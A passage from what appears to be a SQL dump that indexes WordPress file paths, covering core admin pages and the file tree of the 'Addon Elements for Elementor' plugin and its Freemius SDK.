-admin/network/site-info.php'),(489,'wp-admin/network/site-new.php'),(490,'wp-admin/network/site-settings.php'),(491,'wp-admin/network/site-themes.php'),(492,'wp-admin/network/site-users.php'),(493,'wp-admin/network/sites.php'),(494,'wp-admin/network/theme-editor.php'),(495,'wp-admin/network/theme-install.php'),(496,'wp-admin/network/themes.php'),(497,'wp-admin/network/update-core.php'),(498,'wp-admin/network/update.php'),(499,'wp-admin/network/upgrade.php'),(500,'wp-admin/network/user-edit.php'),(501,'wp-admin/network/user-new.php'),(502,'wp-admin/network/users.php'),(503,'wp-admin/network.php'),(504,'wp-admin/options-discussion.php'),(505,'wp-admin/options-general.php'),(506,'wp-admin/options-head.php'),(507,'wp-admin/options-media.php'),(508,'wp-admin/options-permalink.php'),(509,'wp-admin/options-privacy.php'),(510,'wp-admin/options-reading.php'),(511,'wp-admin/options-writing.php'),(512,'wp-admin/options.php'),(513,'wp-admin/plugin-editor.php'),(514,'wp-admin/plugin-install.php'),(515,'wp-admin/plugins.php'),(516,'wp-admin/post-new.php'),(517,'wp-admin/post.php'),(518,'wp-admin/press-this.php'),(519,'wp-admin/privacy-policy-guide.php'),(520,'wp-admin/privacy.php'),(521,'wp-admin/profile.php'),(522,'wp-admin/revision.php'),(523,'wp-admin/setup-config.php'),(524,'wp-admin/site-health-info.php'),(525,'wp-admin/site-health.php'),(526,'wp-admin/term.php'),(527,'wp-admin/theme-editor.php'),(528,'wp-admin/theme-install.php'),(529,'wp-admin/themes.php'),(530,'wp-admin/tools.php'),(531,'wp-admin/update-core.php'),(532,'wp-admin/update.php'),(533,'wp-admin/upgrade-functions.php'),(534,'wp-admin/upgrade.php'),(535,'wp-admin/upload.php'),(536,'wp-admin/user/about.php'),(537,'wp-admin/user/admin.php'),(538,'wp-admin/user/credits.php'),(539,'wp-admin/user/freedoms.php'),(540,'wp-admin/user/index.php'),(541,'wp-admin/user/menu.php'),(542,'wp-admin/user/privacy.php'),(543,'wp-admin/user/profile.php'),(544,'wp-admin/user/user-edit.php'),(545,'wp-admin/user-edit.php'),(546,'wp-admin/user-new.php'),(547,'wp-admin/users.php'),(548,'wp-admin/widgets.php'),(549,'wp-blog-header.php'),(550,'wp-comments-post.php'),(551,'wp-config-sample.php'),(552,'wp-config.php'),(553,'wp-content/index.php'),(554,'wp-content/plugins/addon-elements-for-elementor-page-builder/assets/aep.png'),(555,'wp-content/plugins/addon-elements-for-elementor-page-builder/assets/css/arrow-left.svg'),(556,'wp-content/plugins/addon-elements-for-elementor-page-builder/assets/css/arrow-right.svg'),(557,'wp-content/plugins/addon-elements-for-elementor-page-builder/assets/css/eae-admin.css'),(558,'wp-content/plugins/addon-elements-for-elementor-page-builder/assets/css/eae-admin.min.css'),(559,'wp-content/plugins/addon-elements-for-elementor-page-builder/assets/css/eae.css'),(560,'wp-content/plugins/addon-elements-for-elementor-page-builder/assets/css/eae.min.css'),(561,'wp-content/plugins/addon-elements-for-elementor-page-builder/assets/digit-sep-svg.svg'),(562,'wp-content/plugins/addon-elements-for-elementor-page-builder/assets/digits-svg-alpha.svg'),(563,'wp-content/plugins/addon-elements-for-elementor-page-builder/assets/js/admin.js'),(564,'wp-content/plugins/addon-elements-for-elementor-page-builder/assets/js/admin.min.js'),(565,'wp-content/plugins/addon-elements-for-elementor-page-builder/assets/js/animated-main.js'),(566,'wp-content/plugins/addon-elements-for-elementor-page-builder/assets/js/animated-main.min.js'),(567,'wp-content/plugins/addon-elements-for-elementor-page-builder/assets/js/eae.js'),(568,'wp-content/plugins/addon-elements-for-elementor-page-builder/assets/js/eae.min.js'),(569,'wp-content/plugins/addon-elements-for-elementor-page-builder/assets/js/particles.js'),(570,'wp-content/plugins/addon-elements-for-elementor-page-builder/assets/js/particles.min.js'),(571,'wp-content/plugins/addon-elements-for-elementor-page-builder/assets/js/stickyanything.js'),(572,'wp-content/plugins/addon-elements-for-elementor-page-builder/assets/js/stickyanything.min.js'),(573,'wp-content/plugins/addon-elements-for-elementor-page-builder/assets/lib/eae-icons/fonts/eae-icons.eot'),(574,'wp-content/plugins/addon-elements-for-elementor-page-builder/assets/lib/eae-icons/fonts/eae-icons.svg'),(575,'wp-content/plugins/addon-elements-for-elementor-page-builder/assets/lib/eae-icons/fonts/eae-icons.ttf'),(576,'wp-content/plugins/addon-elements-for-elementor-page-builder/assets/lib/eae-icons/fonts/eae-icons.woff'),(577,'wp-content/plugins/addon-elements-for-elementor-page-builder/assets/lib/eae-icons/style.css'),(578,'wp-content/plugins/addon-elements-for-elementor-page-builder/assets/lib/isotope/isotope.pkgd.js'),(579,'wp-content/plugins/addon-elements-for-elementor-page-builder/assets/lib/isotope/isotope.pkgd.min.js'),(580,'wp-content/plugins/addon-elements-for-elementor-page-builder/assets/lib/magnific.js'),(581,'wp-content/plugins/addon-elements-for-elementor-page-builder/assets/lib/magnific.min.js'),(582,'wp-content/plugins/addon-elements-for-elementor-page-builder/assets/lib/swiper/css/swiper.css'),(583,'wp-content/plugins/addon-elements-for-elementor-page-builder/assets/lib/swiper/css/swiper.min.css'),(584,'wp-content/plugins/addon-elements-for-elementor-page-builder/assets/lib/swiper/js/swiper.esm.bundle.js'),(585,'wp-content/plugins/addon-elements-for-elementor-page-builder/assets/lib/swiper/js/swiper.esm.js'),(586,'wp-content/plugins/addon-elements-for-elementor-page-builder/assets/lib/swiper/js/swiper.js'),(587,'wp-content/plugins/addon-elements-for-elementor-page-builder/assets/lib/swiper/js/swiper.min.js'),(588,'wp-content/plugins/addon-elements-for-elementor-page-builder/assets/lib/swiper/js/swiper.min.js.map'),(589,'wp-content/plugins/addon-elements-for-elementor-page-builder/assets/lib/tilt/tilt.jquery.js'),(590,'wp-content/plugins/addon-elements-for-elementor-page-builder/assets/lib/tilt/tilt.jquery.min.js'),(591,'wp-content/plugins/addon-elements-for-elementor-page-builder/assets/lib/vegas/overlays/00.png'),(592,'wp-content/plugins/addon-elements-for-elementor-page-builder/assets/lib/vegas/overlays/01.png'),(593,'wp-content/plugins/addon-elements-for-elementor-page-builder/assets/lib/vegas/overlays/02.png'),(594,'wp-content/plugins/addon-elements-for-elementor-page-builder/assets/lib/vegas/overlays/03.png'),(595,'wp-content/plugins/addon-elements-for-elementor-page-builder/assets/lib/vegas/overlays/04.png'),(596,'wp-content/plugins/addon-elements-for-elementor-page-builder/assets/lib/vegas/overlays/05.png'),(597,'wp-content/plugins/addon-elements-for-elementor-page-builder/assets/lib/vegas/overlays/06.png'),(598,'wp-content/plugins/addon-elements-for-elementor-page-builder/assets/lib/vegas/overlays/07.png'),(599,'wp-content/plugins/addon-elements-for-elementor-page-builder/assets/lib/vegas/overlays/08.png'),(600,'wp-content/plugins/addon-elements-for-elementor-page-builder/assets/lib/vegas/overlays/09.png'),(601,'wp-content/plugins/addon-elements-for-elementor-page-builder/assets/lib/vegas/vegas.css'),(602,'wp-content/plugins/addon-elements-for-elementor-page-builder/assets/lib/vegas/vegas.js'),(603,'wp-content/plugins/addon-elements-for-elementor-page-builder/assets/lib/vegas/vegas.min.css'),(604,'wp-content/plugins/addon-elements-for-elementor-page-builder/assets/lib/vegas/vegas.min.css.map'),(605,'wp-content/plugins/addon-elements-for-elementor-page-builder/assets/lib/vegas/vegas.min.js'),(606,'wp-content/plugins/addon-elements-for-elementor-page-builder/assets/lib/vegas/vegas.min.js.map'),(607,'wp-content/plugins/addon-elements-for-elementor-page-builder/assets/screenshot-1.png'),(608,'wp-content/plugins/addon-elements-for-elementor-page-builder/assets/screenshot-2.png'),(609,'wp-content/plugins/addon-elements-for-elementor-page-builder/assets/screenshot-3.png'),(610,'wp-content/plugins/addon-elements-for-elementor-page-builder/assets/screenshot-4.png'),(611,'wp-content/plugins/addon-elements-for-elementor-page-builder/base/eae-widget-base.php'),(612,'wp-content/plugins/addon-elements-for-elementor-page-builder/base/module-base.php'),(613,'wp-content/plugins/addon-elements-for-elementor-page-builder/classes/helper.php'),(614,'wp-content/plugins/addon-elements-for-elementor-page-builder/classes/post-helper.php'),(615,'wp-content/plugins/addon-elements-for-elementor-page-builder/controls/group/grid-control.php'),(616,'wp-content/plugins/addon-elements-for-elementor-page-builder/controls/group/icon.php'),(617,'wp-content/plugins/addon-elements-for-elementor-page-builder/controls/group/icon_timeline.php'),(618,'wp-content/plugins/addon-elements-for-elementor-page-builder/controls/hover-transition.php'),(619,'wp-content/plugins/addon-elements-for-elementor-page-builder/elementor-addon-elements.php'),(620,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/LICENSE.txt'),(621,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/README.md'),(622,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/assets/css/admin/account.css'),(623,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/assets/css/admin/add-ons.css'),(624,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/assets/css/admin/affiliation.css'),(625,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/assets/css/admin/checkout.css'),(626,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/assets/css/admin/common.css'),(627,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/assets/css/admin/connect.css'),(628,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/assets/css/admin/debug.css'),(629,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/assets/css/admin/dialog-boxes.css'),(630,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/assets/css/admin/gdpr-optin-notice.css'),(631,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/assets/css/admin/index.php'),(632,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/assets/css/customizer.css'),(633,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/assets/css/index.php'),(634,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/assets/img/addon-elements-for-elementor-page-builder.png'),(635,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/assets/img/form-vibes.png'),(636,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/assets/img/index.php'),(637,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/assets/img/plugin-icon.png'),(638,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/assets/img/theme-icon.png'),(639,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/assets/index.php'),(640,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/assets/js/index.php'),(641,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/assets/js/nojquery.ba-postmessage.js'),(642,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/assets/js/nojquery.ba-postmessage.min.js'),(643,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/assets/js/postmessage.js'),(644,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/config.php'),(645,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/includes/class-freemius-abstract.php'),(646,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/includes/class-freemius.php'),(647,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/includes/class-fs-admin-notices.php'),(648,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/includes/class-fs-api.php'),(649,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/includes/class-fs-logger.php'),(650,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/includes/class-fs-options.php'),(651,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/includes/class-fs-plugin-updater.php'),(652,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/includes/class-fs-security.php'),(653,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/includes/class-fs-storage.php'),(654,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/includes/class-fs-user-lock.php'),(655,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/includes/customizer/class-fs-customizer-support-section.php'),(656,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/includes/customizer/class-fs-customizer-upsell-control.php'),(657,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/includes/customizer/index.php'),(658,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/includes/debug/class-fs-debug-bar-panel.php'),(659,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/includes/debug/debug-bar-start.php'),(660,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/includes/debug/index.php'),(661,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/includes/entities/class-fs-affiliate-terms.php'),(662,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/includes/entities/class-fs-affiliate.php'),(663,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/includes/entities/class-fs-billing.php'),(664,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/includes/entities/class-fs-entity.php'),(665,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/includes/entities/class-fs-payment.php'),(666,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/includes/entities/class-fs-plugin-info.php'),(667,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/includes/entities/class-fs-plugin-license.php'),(668,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/includes/entities/class-fs-plugin-plan.php'),(669,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/includes/entities/class-fs-plugin-tag.php'),(670,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/includes/entities/class-fs-plugin.php'),(671,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/includes/entities/class-fs-pricing.php'),(672,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/includes/entities/class-fs-scope-entity.php'),(673,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/includes/entities/class-fs-site.php'),(674,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/includes/entities/class-fs-subscription.php'),(675,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/includes/entities/class-fs-user.php'),(676,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/includes/entities/index.php'),(677,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/includes/fs-core-functions.php'),(678,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/includes/fs-essential-functions.php'),(679,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/includes/fs-plugin-info-dialog.php'),(680,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/includes/i18n.php'),(681,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/includes/index.php'),(682,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/includes/l10n.php'),(683,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/includes/managers/class-fs-admin-menu-manager.php'),(684,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/includes/managers/class-fs-admin-notice-manager.php'),(685,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/includes/managers/class-fs-cache-manager.php'),(686,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/includes/managers/class-fs-gdpr-manager.php'),(687,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/includes/managers/class-fs-key-value-storage.php'),(688,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/includes/managers/class-fs-license-manager.php'),(689,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/includes/managers/class-fs-option-manager.php'),(690,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/includes/managers/class-fs-plan-manager.php'),(691,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/includes/managers/class-fs-plugin-manager.php'),(692,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/includes/managers/index.php'),(693,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/includes/sdk/Exceptions/ArgumentNotExistException.php'),(694,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/includes/sdk/Exceptions/EmptyArgumentException.php'),(695,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/includes/sdk/Exceptions/Exception.php'),(696,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/includes/sdk/Exceptions/InvalidArgumentException.php'),(697,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/includes/sdk/Exceptions/OAuthException.php'),(698,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/includes/sdk/Exceptions/index.php'),(699,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/includes/sdk/FreemiusBase.php'),(700,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/includes/sdk/FreemiusWordPress.php'),(701,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/includes/sdk/LICENSE.txt'),(702,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/includes/sdk/index.php'),(703,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/includes/supplements/fs-essential-functions-1.1.7.1.php'),(704,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/includes/supplements/fs-essential-functions-2.2.1.php'),(705,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/includes/supplements/index.php'),(706,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/index.php'),(707,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/languages/freemius-da_DK.mo'),(708,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/languages/freemius-da_DK.po'),(709,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/languages/freemius-en.mo'),(710,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/languages/freemius-en.po'),(711,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/languages/freemius-es_ES.mo'),(712,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/languages/freemius-es_ES.po'),(713,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/languages/freemius-fr_FR.mo'),(714,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/languages/freemius-fr_FR.po'),(715,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/languages/freemius-he_IL.mo'),(716,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/languages/freemius-he_IL.po'),(717,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/languages/freemius-hu_HU.mo'),(718,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/languages/freemius-hu_HU.po'),(719,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/languages/freemius-it_IT.mo'),(720,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/languages/freemius-it_IT.po'),(721,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/languages/freemius-ja_JP.mo'),(722,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/languages/freemius-ja_JP.po'),(723,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/languages/freemius-nl_NL.mo'),(724,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/languages/freemius-nl_NL.po'),(725,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/languages/freemius-ru_RU.mo'),(726,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/languages/freemius-ru_RU.po'),(727,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/languages/freemius.pot'),(728,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/languages/index.php'),(729,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/package.json'),(730,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/require.php'),(731,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/start.php'),(732,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/templates/account/billing.php'),(733,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/templates/account/index.php'),(734,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/templates/account/partials/activate-license-button.php'),(735,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/templates/account/partials/addon.php'),(736,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/templates/account/partials/deactivate-license-button.php'),(737,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/templates/account/partials/index.php'),(738,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/templates/account/partials/site.php'),(739,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/templates/account/payments.php'),(740,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/templates/account.php'),(741,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/templates/add-ons.php'),(742,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/templates/add-trial-to-pricing.php'),(743,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/templates/admin-notice.php'),(744,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/templates/ajax-loader.php'),(745,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/templates/auto-installation.php'),(746,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/templates/checkout.php'),(747,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/templates/connect.php'),(748,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/templates/contact.php'),(749,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/templates/debug/api-calls.php'),(750,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/templates/debug/index.php'),(751,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/templates/debug/logger.php'),(752,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/templates/debug/plugins-themes-sync.php'),(753,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/templates/debug/scheduled-crons.php'),(754,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/templates/debug.php'),(755,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/templates/email.php'),(756,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/templates/firewall-issues-js.php'),(757,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/templates/forms/affiliation.php'),(758,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/templates/forms/deactivation/contact.php'),(759,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/templates/forms/deactivation/form.php'),(760,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/templates/forms/deactivation/index.php'),(761,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/templates/forms/deactivation/retry-skip.php'),(762,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/templates/forms/index.php'),(763,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/templates/forms/license-activation.php'),(764,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/templates/forms/optout.php'),(765,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/templates/forms/premium-versions-upgrade-handler.php'),(766,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/templates/forms/premium-versions-upgrade-metadata.php'),(767,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/templates/forms/resend-key.php'),(768,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/templates/forms/subscription-cancellation.php'),(769,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/templates/forms/trial-start.php'),(770,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/templates/gdpr-optin-js.php'),(771,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/templates/index.php'),(772,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/templates/js/index.php'),(773,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/templates/js/jquery.content-change.php'),(774,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/templates/js/open-license-activation.php'),(775,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/templates/js/style-premium-theme.php'),(776,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/templates/partials/network-activation.php'),(777,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/templates/plugin-icon.php'),(778,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/templates/plugin-info/description.php'),(779,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/templates/plugin-info/features.php'),(780,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/templates/plugin-info/index.php'),(781,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/templates/plugin-info/screenshots.php'),(782,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/templates/powered-by.php'),(783,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/templates/pricing.php'),(784,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/templates/secure-https-header.php'),(785,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/templates/sticky-admin-notice-js.php'),(786,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/templates/tabs-capture-js.php'),(787,'wp-content/plugins/addon-elements-for-elementor-page-builder/freemius/templates/tabs.php'),(788,'wp-content/plugins/addon-elements-for-elementor-page-builder/inc/admin/Settings.php'),(789,'wp-content/plugins/addon-elements-for-elementor-page-builder/inc/admin/controls.php'),(790,'wp-content/plugins/addon-elements-for-elementor-page-builder/inc/admin/settings-page.php'),(791,'wp-content/plugins/addon-elements-for-elementor-page-builder/inc/bootstrap.php'),(792,'wp-content/plugins/addon-elements-for-elementor-page-builder/inc/elementor-helper.php'),(793,'wp-content/plugins/addon-elements-for-elementor-page-builder/managers/module-manager.php'),(794,'wp-content/plugins/addon-elements-for-elementor-page-builder/modules/advance-tabs.php'),(795,'wp-content/plugins/addon-elements-for-elementor-page-builder/modules/animated-gradient/module.php'),(796,'wp-content/plugins/addon-elements-for-elementor-page-builder/modules/animated-text/module.php'),(797,'wp-content/plugins/addon-elements-for-elementor-page-builder/modules/animated-text/widgets/animated-text.php'),(798,'wp-content/plugins/addon-elements-for-elementor-page-builder/modules/bg-slider/module.php'),(799,'wp-content/plugins/addon-elements-for-elementor-page-builder/modules/comparison-table/module.php'),(800,'wp-content/plugins/addon-elements-for-elementor-page-builder/modules/comparison-table/widgets/comparison-table.php'),(801,'wp-content/plugins/addon-elements-for-elementor-page-builder/modules/control-test.php'),(802,'wp-content/plugins/addon-elements-for-elementor-page-builder/modules/dual-button/module.php'),(803,'wp-content/plugins/addon-elements-for-elementor-page-builder/modules/dual-button/widgets/dual-button.php'),(804,'wp-content/plugins/addon-elements-for-elementor-page-builder/modules/evergreen-timer/module.php'),(805,'wp-content/plugins/addon-elements-for-elementor-page-builder/modules/evergreen-timer/skins/skin-1.php'),(806,'wp-content/plugins/addon-elements-for-elementor-page-builder/modules/evergreen-timer/skins/skin-2.php'),(807,'wp-content/plugins/addon-elements-for-elementor-page-builder/modules/evergreen-timer/skins/skin-3.php'),(808,'wp-content/plugins/addon-elements-for-elementor-page-builder/modules/evergreen-timer/skins/skin-4.php'),(809,'wp-content/plugins/addon-elements-for-elementor-page-builder/modules/evergreen-timer/skins/skin-base.php'),(810,'wp-content/plugins/addon-elements-for-elementor-page-builder/modules/evergreen-timer/style.scss'),(811,'wp-content/plugins/addon-elements-for-elementor-page-builder/modules/evergreen-timer/widgets/evergreen-timer.php'),(812,'wp-content/plugins/addon-elements-for-elementor-page-builder/modules/filterable-gallery/module.php'),(813,'wp-content/plugins/addon-elements-for-elementor-page-builder/modules/filterable-gallery/widgets/filterable-gallery.php'),(814,'wp-content/plugins/addon-elements-for-elementor-page-builder/modules/flip-box/module.php'),(815,'wp-content/plugins/addon-elements-for-elementor-page-builder/modules/flip-box/widgets/flip-box.php'),(816,'wp-content/plugins/addon-elements-for-elementor-page-builder/modules/flip-box-set.php'),(817,'wp-content/plugins/addon-elements-for-elementor-page-builder/modules/gmap/module.php'),(818,'wp-content/plugins/addon-elements-for-elementor-page-builder/modules/gmap/widgets/gmap.php'),(819,'wp-content/plugins/addon-elements-for-elementor-page-builder/modules/image-compare/module.php'),(820,'wp-content/plugins/addon-elements-for-elementor-page-builder/modules/image-compare/widgets/image-compare.php'),(821,'wp-content/plugins/addon-elements-for-elementor-page-builder/modules/info-circle/module.php'),(822,'wp-content/plugins/addon-elements-for-elementor-page-builder/modules/info-circle/skins/skin-1.php'),(823,'wp-content/plugins/addon-elements-for-elementor-page-builder/modules/info-circle/skins/skin-2.php'),(824,'wp-content/plugins/addon-elements-for-elementor-page-builder/modules/info-circle/skins/skin-3.php'),(825,'wp-content/plugins/addon-elements-for-elementor-page-builder/modules/info-circle/skins/skin-4.php'),(826,'wp-content/plugins/addon-elements-for-elementor-page-builder/modules/info-circle/skins/skin-base.php'),(827,'wp-content/plugins/addon-elements-for-elementor-page-builder/modules/info-circle/style.scss'),(828,'wp-content/plugins/addon-elements-for-elementor-page-builder/modules/info-circle/widgets/info-circle.php'),(829,'wp-content/plugins/addon-elements-for-elementor-page-builder/modules/modal-popup/module.php'),(830,'wp-content/plugins/addon-elements-for-elementor-page-builder/modules/modal-popup/widgets/modal-popup.php'),(831,'wp-content/plugins/addon-elements-for-elementor-page-builder/modules/particles/module.php'),(832,'wp-content/plugins/addon-elements-for-elementor-page-builder/modules/pinterest.php'),(833,'wp-content/plugins/addon-elements-for-elementor-page-builder/modules/post-list/module.php'),(834,'wp-content/plugins/addon-elements-for-elementor-page-builder/modules/post-list/widgets/post-list.php'),(835,'wp-content/plugins/addon-elements-for-elementor-page-builder/modules/price-table/module.php'),(836,'wp-content/plugins/addon-elements-for-elementor-page-builder/modules/price-table/widgets/price-table.php'),(837,'wp-content/plugins/addon-elements-for-elementor-page-builder/modules/progress-bar/module.php'),(838,'wp-content/plugins/addon-elements-for-elementor-page-builder/modules/progress-bar/skins/skin-1.php'),(839,'wp-content/plugins/addon-elements-for-elementor-page-builder/modules/progress-bar/skins/skin-2.php'),(840,'wp-content/plugins/addon-elements-for-elementor-page-builder/modules/progress-bar/skins/skin-3.p